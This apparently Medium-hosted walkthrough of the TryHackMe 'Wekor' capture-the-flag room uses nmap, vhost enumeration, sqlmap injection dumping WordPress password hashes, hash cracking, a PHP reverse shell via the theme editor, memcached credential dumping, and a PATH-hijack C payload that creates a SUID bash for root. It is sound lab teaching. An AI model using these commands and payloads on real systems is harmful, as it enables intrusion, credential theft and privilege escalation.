Wekor — TryHackMe

Wekor THM

CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;) This room can be found here:

https://tryhackme.com/room/wekorra

Before starting add an entry in to /etc/hosts file on your attacking box with with the IP Address of the target we got and a name “wekor.thm”:

10.10.110.202 wekor.thm

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- wekor.thm

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- wekor.thm
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80 10.10.98.254

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p22,80 wekor.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 95:c3:ce:af:07:fa:e2:8e:29:04:e4:cd:14:6a:21:b5 (RSA)
| 256 4d:99:b5:68:af:bb:4e:66:ce:72:70:e6:e3:f8:96:a4 (ECDSA)
|_ 256 0d:e5:7d:e8:1a:12:c0:dd:b7:66:5e:98:34:55:59:f6 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 9 disallowed entries
| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot
|_/comingreallysoon /interesting
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

Browsing through all the entries in robots.txt, found one website at:

http://wekor.thm/it-next/it_blog.php

Also let brute force directories for http://wekor.thm/it-next

FFUF

┌──(kali㉿kali)-[/opt/tools]
└─$ ffuf -u http://wekor.thm/it-next/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://wekor.thm/it-next/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.php [Status: 200, Size: 66925, Words: 19904, Lines: 1246]
images [Status: 301, Size: 315, Words: 20, Lines: 10]
css [Status: 301, Size: 312, Words: 20, Lines: 10]
js [Status: 301, Size: 311, Words: 20, Lines: 10]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1]
fonts [Status: 301, Size: 314, Words: 20, Lines: 10]
revolution [Status: 301, Size: 319, Words: 20, Lines: 10]
[Status: 200, Size: 66925, Words: 19904, Lines: 1246]
.php [Status: 403, Size: 274, Words: 20, Lines: 10]
.html [Status: 403, Size: 274, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 461 req/sec :: Duration: [0:20:36] :: Errors: 0 ::

Nothing interesting here. Room description talked about vhost enumeration.In the next section let’s check if there is any other vhost here.

Virtual Host Enumeration

We can use gobuster to enumerate for virtual host:

┌──(kali㉿kali)-[/tmp]
└─$ gobuster vhost -u wekor.thm -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://wekor.thm
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/03/08 16:11:56 Starting gobuster
===============================================================
Found: site.wekor.thm (Status: 200) [Size: 143]
===============================================================
2021/03/08 16:12:35 Finished
===============================================================

And we found one.

Update the /etc/hosts file with the new website which we found in the above scan as:

10.10.110.202 site.wekor.thm
10.10.110.202 wekor.thm

Let’s access this new site via the broswer:

site.wekor.thm

We got a potential username.Now brute force this new site using ffuf to find directories which we can access:

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://site.wekor.thm/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://site.wekor.thm/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 143, Words: 27, Lines: 6]
wordpress [Status: 301, Size: 320, Words: 20, Lines: 10]
[Status: 200, Size: 143, Words: 27, Lines: 6]
.html [Status: 403, Size: 279, Words: 20, Lines: 10]
.php [Status: 403, Size: 279, Words: 20, Lines: 10]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 464 req/sec :: Duration: [0:38:07] :: Errors: 0 ::

Ah finally we got a WordPress site:

wordpress

Enumerate this site with WPScan:

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://site.wekor.thm/wordpress/ --enumerate vp,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.15
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://site.wekor.thm/wordpress/ [10.10.110.202]
[+] Started: Mon Mar 8 16:25:32 2021
Interesting Finding(s):[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://site.wekor.thm/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://site.wekor.thm/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://site.wekor.thm/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://site.wekor.thm/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.6 identified (Outdated, released on 2020-12-08).
| Found By: Rss Generator (Passive Detection)
| - http://site.wekor.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.6</generator>
| - http://site.wekor.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.6</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/
| Last Updated: 2020-12-22T00:00:00.000Z
| Readme: http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.1
| Style URL: http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.0
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.0, Match: 'Version: 1.0'
[+] Enumerating Vulnerable Plugins (via Passive Methods)[i] No plugins Found.[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:01:50 <===================================================================> (10 / 10) 100.00% Time: 00:01:50
[i] User(s) Identified:[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://site.wekor.thm/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Mar 8 16:30:20 2021
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 14.766 KB
[+] Data Received: 394.663 KB
[+] Memory used: 239.621 MB
[+] Elapsed time: 00:04:48

Tried few things like Brute Forcing password for user admin with WPScan:

wpscan --url http://site.wekor.thm/wordpress/-U user.txt -P /usr/share/wordlists/rockyou.txt -vv

But couldn’t find the password. Checked for directories /wp-content/ and /wp-includes/ but they are not accessible. So this looks to be a dead end.

Back to the other site:

http://wekor.thm/it-next/it_cart.php

Room description mentioned about SQLi, so checked the site found one vulnerable injection point at:

http://wekor.thm/it-next/it_cart.php

sqli

We have a SQL injection vulnerability here as we get an error when we put in a single quote in the Apply Coupon Input box.

Lets exploit this using SQLMap. Capture the POST request for this URL in Burp Suite and put that request in a text file named request.txt.

burp request

Run SQLmap:

sqlmap -r request.txt

This confirms that we have SQL injection possible:

sqlmap sqli payloads

Check for available Databases:

sqlmap -r request.txt --dbs

db names

Check tables in WordPress database:

sqlmap -r request.txt -D wordpress -tables

WordPress tables

Dump the table “wp_users”

sqlmap -r request.txt --dump -D wordpress -T wp_users

WordPress wp_users table

So we a hash for user “admin” for the site: http://site.wekor.thm/wordpress

From here we can see the type of has is “phpass”:

phpass hash type

Put all the hashes in a text file and crack then using JTR:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass hash.txt

john the ripper

Got some hashes cracked and trying the cracked password for user “wp_yura” we were able to login to http://site.wekor.thm/wordpress/wp-login.php.

Reverse Shell

Now it is possible to get a reverse shell from here by injecting a php reverse shell via Appearance->Theme Editor->404 Template(404.php):

php reverse shell

Remember to put in the IP Address and Port Number of the machine where we want to get a reverse shell back. Also start a netcat session on that machine. Now acess the 404.php using the following link:

http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php

And we got a reverse shell:

nc reverse shell

Stabilize the shell by running the following commands:

/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm

Run Linux Smart Enumeration Script on the target and found a service which is running internally on port 11211:

LSE internal port

Searching about port 11211 reveals that is a service called memcached. Read more about it from https://memcached.org/:

Free & open source, high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.

Memcached is an in-memory key-value store for small chunks of arbitrary data (strings, objects) from results of database calls, API calls, or page rendering.

Also found this resource which explains how this can be exploited. Connected via telnet from the target itself to this service and was able to dump Credentials for a user named Orka:

www-data@osboxes:/var/www$ telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats items
STAT items:1:number 5
STAT items:1:age 16154
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 0
STAT items:1:lrutail_reflocked 0
END
stats cachedump 1 0
ITEM username [4 b; 1615303696 s]
ITEM password [15 b; 1615303696 s]
ITEM id [4 b; 1615303696 s]
ITEM email [14 b; 1615303696 s]
ITEM salary [8 b; 1615303696 s]
END
get username
VALUE username 0 4
Orka
END
get password
VALUE password 0 15
[REDACTED]
END
quit
Connection closed by foreign host.
www-data@osboxes:/var/www$

Let’s try to switch user to “Orka” using the credentials found:

user.txt

We for our user flag in the home directory of user “Orka”

Privilege Escalation

Now it’s time to do privilege escalation. First of all before running any script let’s check if Orka can run anything using sudo -l :

sudo -l

Let’s try to execute this binary as sudo and check how it behaves:

bitcon binary

Hmm, we need a password. Let’s see what this binary contains using strings

strings /home/Orka/Desktop/bitcoin

strings bitcoin

Two things we noticed:

  • Password may be password
  • python exe is called without the full path

So it might be possible to overwrite this python binary and this is called from inside the bitcoin exe.

Investigating the PATH variable, we are able to write to /usr/sbin directory

Let’s create a fake binary called python with the following content:

#include <stdio.h>
#include <stdlib.h>
void main(){
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Compile it using:

gcc -o python python.c

and copy it in /usr/sbin and give it execute permission:

fake python binary

Run the bitcoin binary:

sudo /home/Orka/Desktop/bitcoin
root.txt

We are root and we for our root flag in /root.

This was a great room and the memcache was a new learning for me.

Thanks for reading. If you like the write-up please clap.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to Package Java Projects in Python Tar files

Best Code Editors

Apache Spark Architecture and processing in breif

Play MIDI Notes in Swift’s Playgrounds

Whats are Closures in Scala

Result Code 6004 Reported When an HMS Core SDK API Is Called

Spring Module Integration In Mule Application

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

THM Pickle Rick writeup

DEVELPY — TryHackMe WriteUp

TryHackme: GameBuzz

Throwback — Part 1 — pfSense